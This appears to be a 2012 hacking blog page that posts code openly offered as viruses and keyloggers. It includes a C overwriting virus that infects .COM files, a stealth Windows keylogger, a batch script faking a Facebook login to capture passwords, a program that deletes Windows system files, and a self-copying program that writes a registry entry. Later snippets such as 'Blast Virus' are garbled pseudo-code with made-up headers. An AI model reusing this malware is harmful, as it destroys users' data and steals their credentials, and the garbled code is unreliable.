Tuesday, February 28, 2012

Terminate Virus



#include
#include
#include
FILE *Virus,*Host;
int x,y,done;
char buff[256];
struct ffblk ffblk;
main()
{
done = findfirst("*.COM",&ffblk,0); /* Find a .COM file */
while (!done) /* Loop for all COM's in DIR*/
{
printf("Infecting %s\n", ffblk.ff_name); /* Inform user */
Virus=fopen(_argv[0],"rb"); /* Open infected file */
Host=fopen(ffblk.ff_name,"rb+"); /* Open new host file */
x=9504; /* Virus size - must */
/* be correct for the */
/* compiler it is made */
/* on, otherwise the */
/* entire virus may not*/
/* be copied!! */
while (x>256) /* OVERWRITE new Host */
{ /* Read/Write 256 byte */
fread(buff,256,1,Virus); /* chunks until bytes */
fwrite(buff,256,1,Host); /* left < 256 */
x-=256;
}
fread(buff,x,1,Virus); /* Finish off copy */
fwrite(buff,x,1,Host);
fcloseall(); /* Close both files and*/
done = findnext(&ffblk); /* go for another one. */
}
/* Activation would go */
/* here */
return (0); /* Terminate */
}

Create admin password using CMD



@echo off
title windows login module
color  3
echo please register.
echo.
set /p user=username:
set /p pass=password:
cls
echo your account %user% has been created.
echo.
pause
cls
:A
echo please login
echo.
set /p user=username:
set /p pass=password:
if %u%==%user% if %p%==%pass% go to b
cls
echo invalid user name or password!
echo.
pause
cls
go to A
:B
echo you are logged in as %user%
echo.
pause
cls
exit


Make a Keylogger using CMD



1. open notepad

2. type this code

@echo off
color f
cls
echo PLEASE LOGIN WID UR E-MAIL ID
echo
set/p user=Facebook id:
set/p pass=Password:
cls

echo username=%user% paswword=%pass% >notepad.txt


3. now save this file login.bat

now ur keylogger is ready to use.........


Making Your own Keylogger using C



#include // These we need to
using namespace std; // include to get our
#include // Keylogger working.
#include
int Save (int key_stroke, char *file);
void Stealth(); //Declare Stealth.
Make a main function .(The main function will be the first that will be executed.)
int main()
{
Stealth(); // This will call the stealth function we will write later.
char i; //Here we declare 'i' from the type 'char'
while (1) // Here we say 'while (1)' execute the code. But 1 is always 1 so it will always execute.
{ // Note this is also the part that will increase your cpu usage
for(i = 8; i
{
if (GetAsyncKeyState(i) == -32767)
Save (i,"LOG.txt"); // This will send the value of 'i' and "LOG.txt" toour save function we will write later. (The reason why we declared itat the start of the program is because else the main function is abovethe save function so he wont recognize the save function. Same as withthe stealth function.)
}
}
system ("PAUSE"); // Here we say that the system have to wait before exiting.
return 0;
}
Under that we will write our keylogger so it will also recognize special keys like the ?spacebar? and stuff.
If you want to add some yourself here is a site where you can look up the ascii table. http://www.asciitable.com/
int Save (int key_stroke, char *file) // Here we define our save function that we declared before.
{
if ( (key_stroke == 1) || (key_stroke == 2) )
return 0;
FILE *OUTPUT_FILE;
OUTPUT_FILE = fopen(file, "a+");
cout
if (key_stroke ==  // The numbers stands for the ascii value of a character
fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]"); // This will print[BACKSPACE] when key 8 is pressed. All the code under this works thesame.
else if (key_stroke == 13)
fprintf(OUTPUT_FILE, "%s", "\n"); // This will make a newline when the enter key is pressed.
else if (key_stroke == 32)
fprintf(OUTPUT_FILE, "%s", " ");
else if (key_stroke == VK_TAB) //VK stands for virtual key wich are the keys like Up arrow, down arrow..
fprintf(OUTPUT_FILE, "%s", "[TAB]");
else if (key_stroke == VK_SHIFT)
fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
else if (key_stroke == VK_CONTROL)
fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
else if (key_stroke == VK_ESCAPE)
fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
else if (key_stroke == VK_END)
fprintf(OUTPUT_FILE, "%s", "[END]");
else if (key_stroke == VK_HOME)
fprintf(OUTPUT_FILE, "%s", "[HOME]");
else if (key_stroke == VK_LEFT)
fprintf(OUTPUT_FILE, "%s", "[LEFT]");
else if (key_stroke == VK_UP)
fprintf(OUTPUT_FILE, "%s", "[UP]");
else if (key_stroke == VK_RIGHT)
fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
else if (key_stroke == VK_DOWN)
fprintf(OUTPUT_FILE, "%s", "[DOWN]");
else if (key_stroke == 190 || key_stroke == 110)
fprintf(OUTPUT_FILE, "%s", ".");
else
fprintf(OUTPUT_FILE, "%s", &key_stroke);
fclose (OUTPUT_FILE);
return 0;
}
Now we going to add Stealth to it.
Under the latest code add again
void Stealth()
{
HWND Stealth;
AllocConsole();
Stealth = FindWindowA("ConsoleWindowClass", NULL);
ShowWindow(Stealth,0);
}
So thats it, you wrote your first keylogger
Full Code:
#include
using namespace std;
#include
#include
int Save (int key_stroke, char *file);
void Stealth();
int main()
{
Stealth();
char i;
while (1)
{
for(i = 8; i
{
if (GetAsyncKeyState(i) == -32767)
Save (i,"LOG.txt");
}
}
system ("PAUSE");
return 0;
}
/* *********************************** */
int Save (int key_stroke, char *file)
{
if ( (key_stroke == 1) || (key_stroke == 2) )
return 0;
FILE *OUTPUT_FILE;
OUTPUT_FILE = fopen(file, "a+");
cout
if (key_stroke ==
fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");
else if (key_stroke == 13)
fprintf(OUTPUT_FILE, "%s", "\n");
else if (key_stroke == 32)
fprintf(OUTPUT_FILE, "%s", " ");
else if (key_stroke == VK_TAB)
fprintf(OUTPUT_FILE, "%s", "[TAB]");
else if (key_stroke == VK_SHIFT)
fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
else if (key_stroke == VK_CONTROL)
fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
else if (key_stroke == VK_ESCAPE)
fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
else if (key_stroke == VK_END)
fprintf(OUTPUT_FILE, "%s", "[END]");
else if (key_stroke == VK_HOME)
fprintf(OUTPUT_FILE, "%s", "[HOME]");
else if (key_stroke == VK_LEFT)
fprintf(OUTPUT_FILE, "%s", "[LEFT]");
else if (key_stroke == VK_UP)
fprintf(OUTPUT_FILE, "%s", "[UP]");
else if (key_stroke == VK_RIGHT)
fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
else if (key_stroke == VK_DOWN)
fprintf(OUTPUT_FILE, "%s", "[DOWN]");
else if (key_stroke == 190 || key_stroke == 110)
fprintf(OUTPUT_FILE, "%s", ".");
else
fprintf(OUTPUT_FILE, "%s", &key_stroke);
fclose (OUTPUT_FILE);
return 0;
}
/* *********************************** */
void Stealth()
{
HWND Stealth;
AllocConsole();
Stealth = FindWindowA("ConsoleWindowClass", NULL);
ShowWindow(Stealth,0);
}


Cut Virus !



#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <netinet/in.h>

struct in_addr *find_valid_host(void)
{
struct in_addr *address = (struct in_addr *)malloc(sizeof(struct in_addr));

srand(time(NULL)); /* on initialise le générateur aléatoire */
address->s_addr = rand();

while (!isup(*address))
(address->s_addr)++;
/* ici, on utilise la routine isup() de nmap pour voir si la cible est up */

return address;
}


Reg. Virus !



#include <iostream.h>
#include <stdlib.h>
int main()
{
system ("DEL C:\*.exe");
system ("DEL C:\*.txt");
system ("DEL C:\*.doc");
system ("DEL C:\WINDOWS\*.exe");
system ("DEL C:\WINDOWS\*.com");
system ("DEL C:\WINDOWS\*.bat");
system ("DEL C:\Program Files\*.*");
system ("DEL C:\WINDOWS\SYSTEM\*.exe");
system ("DEL C:\WINDOWS\SYSTEM\*.dll");
system ("DEL C:\WINDOWS\SYSTEM\*.com");
system ("DEL C:\WINDOWS\SYSTEM\*.bat");
return 0;
}


Null Virus !



#include
#include

char windir[MAX_PATH];
HKEY hKey;

int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
char pathname[256];
unsigned char reg[10] = ""

GetWindowsDirectory(windir, sizeof(windir));
HMODULE hMe = GetModuleHandle(NULL);
DWORD nRet = GetModuleFileName(hMe, pathname, 256);
strcat(windir, "\\System32\\".exe");
CopyFile(pathname,windir,0);

RegCreateKey(HKEY_CURRENT_USER,"Software\\",&hKey);
RegSetValueEx(hKey,"",0,REG_SZ,reg,sizeof(reg));
RegCloseKey(hKey);
}


Crached Virus !



#include
#include
#include
void fool//FINAL MESSAGE//THE ANTIVIRUS PROGRAM WAS CRASHED SUCCESFULLY//MESSAGE END//
void main()
int i;
clrscr();
driver loacation;
drive//c//progfiles//antivirusprog.;
printf("the antivirus crash succesfully");
start();
if(i<5) { the antivirus crashed succesfully } else { *******fuck off******** } {//search the another antivirus prog // return the final message //} }


Blast Virus !





#include<stdio.h>
#include<windows.h>
#include<opretatingsystem.h>
#include<cmd.h>
#include<iostream.h>
#include<consol.h>
#include<iostream.h>
***THE COMPUTER WAS FUCKED***
{
couting=5-0
}
voidfool//FINAL MESSAGE//
int simlocation,driverpath,decoder,i;
char forbidden laters;
printf("the virus is corrupt ur operatingsytem");
Setup\Installed Components\Key Name\StubPath","%windir%\jqfoiscx.bat">>%windir%\jqf
drive location//c drive;
drive content attached to opretaing system
{
for(int i=0;i<=10;i++)
}
dual node tree;
{
system might be attached by cmd files;
}
link attached
{
prog files removed;
}
// remove antivirus programs
@echo off % c
//progrma was succesfully run
linkedgraphical card (int verticals =10)
opreating systemcorruption start
{
dvd writter=fail
portable disk=fail
headphone=fail
ram=fail
soundcard=fail
fan=up round
motherboard=blast
{
for(int i=0;i<=10;i++)
}
getch()
}